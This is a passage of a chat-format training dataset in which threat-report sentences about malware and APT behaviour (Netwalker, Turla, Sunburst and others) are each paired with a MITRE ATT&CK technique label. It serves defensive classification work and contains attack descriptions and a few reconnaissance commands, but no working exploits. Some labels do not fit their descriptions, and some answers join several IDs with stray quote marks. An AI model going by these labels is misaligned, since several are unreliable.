- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used exploits to increase their levels of rights and privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya can use \"wmic\" to help propagate itself across a network."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has utilized malicious VBS scripts in malware."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete files written to disk."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used \"kill.bat\" script to disable security tools."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHARPSTATS has the ability to employ a custom PowerShell script."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot generates a false TLS handshake using a public certificate to disguise C2 network communications."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note: CTU researchers frequently observe threat actors renaming archiving tools and storing data for exfiltration in uncommon directories"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lurid can compress data before sending it."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "spwebmember is used to enumerate and dump information from Microsoft SharePoint."
- },
- {
- "role": "assistant",
- "content": "T1213.002 - Sharepoint"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Many fields in the installation program are forged into Acrobat Reader installation program, and the interface after running is related to Acrobat Reader"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has used spearphishing emails to send trojanized Microsoft Word documents."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Cannon gathers system information and saves it to a file named ini. The Trojan sends an email to sahro.bella7[at]post.cz with i.ini as the attachment, S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts: Bishtr.cam47 Lobrek.chizh Cervot.woprov 2) Bishtr.cam47 3) Lobrek.chizh 4) Cervot.woprov"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kerrdown has gained execution through victims opening malicious links."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Extract the encoded payload. Decrypt the extracted payload. This uses the AES algorithm in CBC mode. Decompress the decrypted payload. This uses the LZMA algorithm. Decrypt the decompressed payload. This is simple XOR with byte key and as such does not impact compression ratio. Execute the decrypted payload as shellcode"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has exploited the CVE-2016-0167 local vulnerability."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also checks for the existence of various tools and utilities that malware analysts often run when analyzing malicious software. It also leverages Structured Exception Handling (SEH) to patch its own code. These measures are all designed to impede the analysis process and make it more expensive to identify what the malware is actually designed to do from a code execution flow perspective. Below the EAX register is stored in a variable to be reused later in order to allocate a heap memory chunk to initiate its own unpacked code. The malware also uses others techniques to make analysis significantly more difficult, like creating hundreds of case comparisons, which makes tracing code much harder. Below an example of several if conditional statements in pseudo code demonstrating this process and how it can result in impeding the ability to efficiently trace the code. In order to decrypt the malware code it's installs an exception handler, which is responsible for decrypting some memory bytes to continue it's execution. Below you can see the SEH has just been initialized: In the same routine, it performs the decryption routine for the following code. The strings are encrypted using an XOR value, however each string uses a separate XOR value preventing an easy detection mechanism. Below is some IDA Python code which can be used to decrypt strings"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As a previous write-up on H1N1 by Arbort Networks describes, the LINK command in this instance results in H1N1 downloading and executing a file from a remotely hosted URL using WinINet HTTP requests. The loader also has the functionality of downloading and executing a base64 encoded file contained in the response from the command and control server via the FILE command"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack can retrieve browser history."
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has a tool called CANDYKING to capture a screenshot of user's desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some malware uses multiple channels for C2, such as RomeoWhiskey-Two, which consists of a RAT channel that parses data in datagram form and a Proxy channel that forms virtual point-to-point sessions."
- },
- {
- "role": "assistant",
- "content": "T1026 - Multiband Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When executed, Kwampirs decrypts and extracts a copy of its main DLL payload from its resource section. Before writing the payload to disk, it inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 malware has injected a Cobalt Strike beacon into Rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has used RDP during operations."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has performed DLL search order hijacking to execute their payload."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An loader Trojan adds the Registry key HKCU\\Environment\\UserInitMprLogonScript to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1037 - Boot or Logon Initialization Scripts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware uses PowerShell and WMI to script data collection and command execution on the victim."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ccf32 can run on a daily basis using a scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has called \"CreateToolhelp32Snapshot\" to enumerate all running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can determine the Windows version and computer name on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat can be issued a command shell function from the C2."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook can collect local files from the system ."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can obtain data from local systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used a cron job for persistence on Mac devices."
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To report an intrusion and request resources for incident response or technical assistance, you are encouraged to contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), the FBI through a local field office, or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).Protect Against SQL Injection and Other Attacks on Web ServicesTo protect against code injections and other attacks, system operators should routinely evaluate known and published vulnerabilities, periodically perform software updates and technology refreshes, and audit external-facing systems for known web application vulnerabilities"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Send exfiltrated data taskkill.exe Ends working cycle of modules Persistence Persistence modules are based on scheduled tasks and system registry"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems."
- },
- {
- "role": "assistant",
- "content": "T1187 - Forced Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used \"net group \"Domain Admins\" /domain\" to identify domain administrators."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The results are Gzipped and saved under random file in the temp folder. Following successful collection of information, the data is send back to the C2 and the file is deleted"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging', 'T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The library used to hide Winnti’s system activity is a copy of the open-source userland rootkit Azazel¹⁰, with minor changes. When executed, it will register symbols for multiple commonly used functions, including: open(), rmdir(), and unlink(), and modify their returns to hide the malware’s operations"
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TinyTurla can install itself as a service on compromised machines."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "scanned the “Program Files” directories for a directory with the string “Total Security” (the installation path of the “360 Total Security” antivirus tool)."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can identify the installed antivirus engine."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet enumerates removable drives for infection."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "installs itself under Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After decrypting itself in memory, RARSTONE downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This “downloaded” file is actually not dropped onto the system."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use WMI queries to retrieve data from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In Carbanak attacks, the groups’ attacks can involve logging into services that accept remote connections and using stolen password hashes through the “pass the hash” method"
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash', 'T1110.002 - Brute Force: Password Cracking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used batch scripts to enumerate users on a victim domain controller."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used FTP to exfiltrate collected data."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In recent weeks, TA551 has changed traffic patterns. 19, 2020, URLs generated by Word macros to retrieve installer binaries followed a noticeable pattern"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is automatically started by the OS, and listens on 127.0.0.1:9050. As noted by ESET, the main backdoor component (icloudsyncd) uses this proxy for communication purposes: “Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server"
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elderwood has encrypted documents and malicious executables."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao can use the \"ping\" command to discover remote systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VaporRage has the ability to check for the presence of a specific DLL and terminate if it is not found."
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the initial phases, the Sunburst malware talks to the C&C server by sending encoded DNS requests. These requests contain information about the infected computer; if the attackers deem it interesting enough, the DNS response includes a CNAME record pointing to a second level C&C server."
- },
- {
- "role": "assistant",
- "content": "T1583.002 - DNS Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp encodes its second-stage payload with Base64."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this particular case in 2013, the config file included an unknown plugin set, aside from the usual ‘ddos’ plugin listing"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes can alter the victim's proxy configuration."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: SecureWorks) NetWire logs keystrokes and peripheral inputs into encoded files in the C:\\Users\\ Figure 3"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kwampirs collects password policy information with the command \"net accounts\"."
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used various batch scripts to establish C2 and download additional files. Gamaredon Group's backdoor malware has also been written to a batch file."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink can use the Linux API `statvfs` to enumerate the current working directory."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used RDP for direct remote point-and-click access."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The figure below shows the example of two of several possible command codes. Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE can exfiltrate collected data to its C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Raindrop is compiled as a DLL, which is built from a modified version of 7-Zip source code. The 7-Zip code is not utilized and is designed to hide malicious functionality added by the attackers. The DLL is compiled where the Name file of the Export Directory Table is “\"7-zip.dll\" and the Export Names are"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
